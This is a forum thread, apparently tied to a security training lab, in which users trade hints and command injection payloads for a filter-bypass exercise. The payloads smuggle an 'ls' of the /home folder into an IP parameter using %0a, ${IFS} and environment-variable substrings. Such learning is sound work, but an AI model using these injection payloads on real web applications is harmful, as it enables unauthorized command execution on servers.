Command Injections - Bypassing Other Blacklisted Characters

wtjsk · May 14, 2022, 11:07am

Hey. I’ve been stuck with this question. " Use what you learned in this section to find name of the user in the ‘/home’ folder. What user did you find?"

I’ve tried some payloads like
127.0.0.1${LS_COLORS:10:1}${IFS}{${LS_COLORS:14:1}${LS_COLORS:38:1},$(tr ‘!-}’ ‘"-~’<<<.gnld)},
127.0.0.1${LS_COLORS:10:1}${IFS}{${LS_COLORS:14:1}${LS_COLORS:38:1},${PATH:0:5},
etc
but none of them works. It just returns something like this

Can someone give me a hint how to solve the question?

wtjsk · May 16, 2022, 8:06am

I updated my payload to 127.0.0.1${LS_COLORS:10:1}${LS_COLORS:14:1}${LS_COLORS:38:1}${IFS}${HOME:0:5}
127.0.0.1${LS_COLORS:10:1}${LS_COLORS:14:1}${LS_COLORS:38:1}${IFS}${HOME:0:1}${LS_COLORS:24:1}${LS_COLORS:39:1}${LS_COLORS:23:1}${LS_COLORS:152:1}
But this is what I get so far. I need help.

QuickFix914 · June 2, 2022, 2:00pm

I know that you’re supposed to use the $PATH variable because it makes the /. I’m stuck here also.
I used ip=127.0.0.1${LS_COLORS}${IFS}${PATH:0:1}${HOME}. It translates to ip=127.0.0.1; /HOME but its not working for me. I feel like something is missing. What does yours translate too?

Alex · June 6, 2022, 4:13pm

Hi, I finally figured it out!
No need to use ${} for letters in the command.
Use it only for slashes and ;.
For spaces use the “space bypass tecnique” on the previous sections

skiddie762 · July 7, 2022, 12:19am

hey could you give a nudge for the final part of the syntax, i got the directory to print in the response but i cannot get whoami to work

Alex · July 7, 2022, 7:45am

Hi, assuming that you have found the correct request and parameter to inject, follow the indications I posted earlier.
For the command itself, take a look to <<< and subshell syntax like &{}, and don’t forget encoding.

xel4k · July 28, 2022, 10:17pm

Hello everyone, Can anyone help me with this one?
I stuck also.
I used multiple scenarios but no luck:
127.0.0.1%0a{IFS}{ls,-la}${IFS}${PATH:0:1}Home

127.0.0.1%0a{IFS}{ls,-la}${IFS}${HOME:0:5}
127.0.0.1 ${LS_COLORS:10:1}${IFS}${PATH:0:1}home

I am not getting invalid input in the responses for the above, but no luck finding the username so i believe to be in the right path of solving it.
Can anyone give me a tip to solve it?

jeddon.clark · October 11, 2022, 5:00am

This one was annoying because it depends on you guessing 2 parts of the command correctly to get any results. For example, why would you intuit that the server would accept plaintext following the command to break the logic, especially when the segment you’re in details how to get arbitrary characters from bit shifting. Here’s a clue for those who are stuck: ip=127.0.0.1%0a${IFS}ls%09${PATH:0:1}home

cyberceh369 · November 29, 2022, 5:11pm

use can use something like this
ip=127.0.0.1%0a{l*,-**,${****:0:1}home}

19delta4u · December 15, 2022, 4:13am

Thank you sir!

John

jamestar · January 15, 2023, 11:49pm

Thank you!

Someone · January 31, 2023, 11:32am

Thanks.

Wathix · February 11, 2023, 8:15pm

Worked.
127.0.0.1%0a{ls,-**}${**S}${PATH:1:0}home